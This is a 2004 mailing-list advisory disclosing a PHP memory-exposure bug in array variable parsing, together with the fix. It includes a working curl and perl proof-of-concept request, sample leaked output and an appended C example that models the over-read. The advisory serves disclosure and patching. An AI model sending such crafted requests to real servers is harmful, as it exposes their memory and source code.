[VulnWatch] PHP Vulnerability N. 1

Subject: [VulnWatch] PHP Vulnerability N. 1
Date: Wed, 15 Sep 2004 18:59:41 +0200
Hi all,
This summer I have been playing around with some PHP issues
and got some PHP vulnerabilities.

Let's go for the first one:



==========================================================
Title: php(super)info().
Affected: PHP <= 5.0.1
Not Affected: it seems PHP <= 4.1.2
Vulnerability Type:  Exposure of sensitive information
Vendor Status: Fix released on cvs.php.net


==Summary:

Bad array parsing in php_variables.c could expose arbitrary memory
content such as pieces of PHP code and other data.
This affects all GET, POST and COOKIE variables.



==Description:

By appending a [ (open square bracket) to a GET/POST/COOKIE array
variable, like abc[a][,
the length of the 'a' array element is set to the length of the variable
name, strlen("abc").


$ curl "http://www.example.com/phpinfo.php" -d `perl -e 'print "f"x100; print "[g][=1"'`

where phpinfo.php is:
<?php
phpinfo();
?>

or some PHP file containing the print_r function:
<?php
print_r($_REQUEST);
?>

it will print output similar to:
------------------------------------------------
Array
(
    [ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff] => Array
        (
            [g\0_\0123\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0] => 1
        )
)
-----------------------------------------------

As you probably noticed, all the garbage shown is memory
content that could be anything (on the heap, I suppose).

I have tried some requests and it sometimes exposes pieces of PHP code.




==Solution:
Authors were contacted and they released a fix for this problem.

The problem is easy to fix.

In main/php_variables.c (around line 136 for PHP 5.0.1), replace:

index_len = var_len = strlen(var);

with:

index_len = var_len = strlen(index);

and compile again.

But if you're lazy, the patch can be found in CVS:
cvs.php.net/main/php_variables.c

=========================================


Stefano Di Paola

....----oOOo-------oOOo----....
Stefano Di Paola
Software Engineer
stefano.dipaola_at_wisec_dot_it
stefano.dipaola1_at_tin_dot_it
--------------------------------
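The index-length computation the advisory describes, as an added example (my own code, not PHP's or the author's): a minimal parser for names of the form base[i0][i1] that sizes every index from its own text, which is the strlen(index) fix given above, plus a function that computes how many bytes the original strlen(var) computation would have exposed for the abc[a][ shape. The type var_name, the functions, and the MAX_DEPTH/MAX_LEN limits are assumptions of this example.

```c
#include <string.h>
#define MAX_DEPTH 8     /* assumed limits for this example; PHP's differ */
#define MAX_LEN   128

typedef struct {        /* assumed type, not PHP's */
    char   base[MAX_LEN];
    size_t base_len;
    char   index[MAX_DEPTH][MAX_LEN];
    size_t index_len[MAX_DEPTH];
    int    depth, unterminated;   /* unterminated: final '[' has no ']' */
} var_name;

/* Parse "base[i0][i1]..." into out; 0 on success, -1 if a component is too long
 * or nesting too deep. Each index_len comes from the index text itself, the
 * advisory's strlen(index) fix, never from the base variable name. */
int parse_var_name(const char *var, var_name *out) {
    memset(out, 0, sizeof *out);
    const char *open = strchr(var, '[');
    out->base_len = open ? (size_t)(open - var) : strlen(var);
    if (out->base_len >= MAX_LEN) return -1;
    memcpy(out->base, var, out->base_len);
    while (open) {
        if (out->depth == MAX_DEPTH) return -1;
        const char *index = open + 1;
        const char *close = strchr(index, ']');
        size_t len = close ? (size_t)(close - index) : strlen(index);
        if (len >= MAX_LEN) return -1;          /* buffers stay NUL-terminated */
        memcpy(out->index[out->depth], index, len);
        out->index_len[out->depth++] = len;
        if (!close) { out->unterminated = 1; break; }
        open = (close[1] == '[') ? close + 1 : NULL;
    }
    return 0;
}

/* For the shape the advisory describes, "abc[a][": bytes past the real index
 * "a" that the buggy index_len = strlen(var) (base name length) would expose. */
size_t buggy_overread_bytes(const char *var) {
    var_name v;
    if (parse_var_name(var, &v) != 0 || !v.unterminated || v.depth < 2) return 0;
    size_t real = v.index_len[v.depth - 2];
    return v.base_len > real ? v.base_len - real : 0;
}

/* The advisory's request: 100 'f' characters followed by "[g][". */
size_t advisory_case_overread(void) {
    char name[128];
    memset(name, 'f', 100);
    strcpy(name + 100, "[g][");
    return buggy_overread_bytes(name);      /* 99 bytes beyond the key "g" */
}
```

The 99 bytes match the roughly 100-character key in the print_r output above: the single-byte index "g" followed by whatever sat after it on the heap.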
